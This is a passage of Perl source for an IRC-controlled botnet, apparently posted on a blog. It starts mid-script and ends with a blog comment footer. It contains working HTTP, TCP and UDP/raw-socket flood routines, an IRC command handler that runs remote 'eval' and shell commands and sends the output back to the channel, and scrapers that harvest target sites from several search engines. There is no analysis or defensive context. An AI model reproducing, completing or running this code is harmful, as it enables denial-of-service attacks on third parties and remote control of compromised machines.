my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1HTTP DDos 12:. 1| 12 Attacking done 1 ".$1.".");
}
######################
# End of HTTPFlood #
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# UDPFlood #
# #
######################
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1UDP DDos 12:. 1| 12 Attacking 1 ".$1." 12 with 1 ".$2." 12 Kb Packets for 1 ".$3." 12 seconds. ");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1UDP DDos 12:. 1| 12 12Results 1 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in 1 ".$dtime." 12seconds to 1 ".$1.".");
}
exit;
}
}
######################
# End of Udpflood #
# #
######################
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
}
else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1;
$porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j {
&join(@_);
}
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_);
}
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
{
my @dominios = ("removed-them-all");
my @str;
foreach $dom (@dominios)
{
push (@str,"@gstring");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
sendraw("privmsg #debug :DEBUG only test googling: ".$query."");
my $page = http_query($query);
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub yahoo(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=100){
my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
my $Res=query($Ya);
while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
my $k=$1;
$k=~s/<b>//g;
$k=~s/<\/b>//g;
$k=~s/<wbr>//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub msn(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
my $Res=query($MsN);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if($1 !~ /msn|live/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub lycos(){
my $inizio=0;
my $pagine=20;
my $key=$_[0];
my $av=0;
my @lst;
while($inizio <= $pagine){
my $lycos="http://search.lycos.com/?query=".key($key)."&page=$av";
my $Res=query($lycos);
while ($Res=~ m/<span class=\"?grnLnk small\"?>http:\/\/(.+?)\//g ){
my $k="$1";
my @grep=links($k);
push(@lst,@grep);
}
$inizio++;
$av++;
}
return @lst;
}
#####
sub aol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=100;$b++){
my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
my $Res=query($AoL);
while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
#####
sub ask(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=10)
{
my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
my $Res=query($Ask);
while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
my $k=$3;
$k=~s/[\"\ ]//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
#####
sub alltheweb()
{
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=100)
{
my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $Res=query($all);
while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
my $k=$1;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=100;$b+=100){
my $Go=("http://www.google.co.ma/search?q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}
sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}
sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}
sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
0개의 덧글:
댓글 쓰기
에 가입 댓글 [Atom]
<< 홈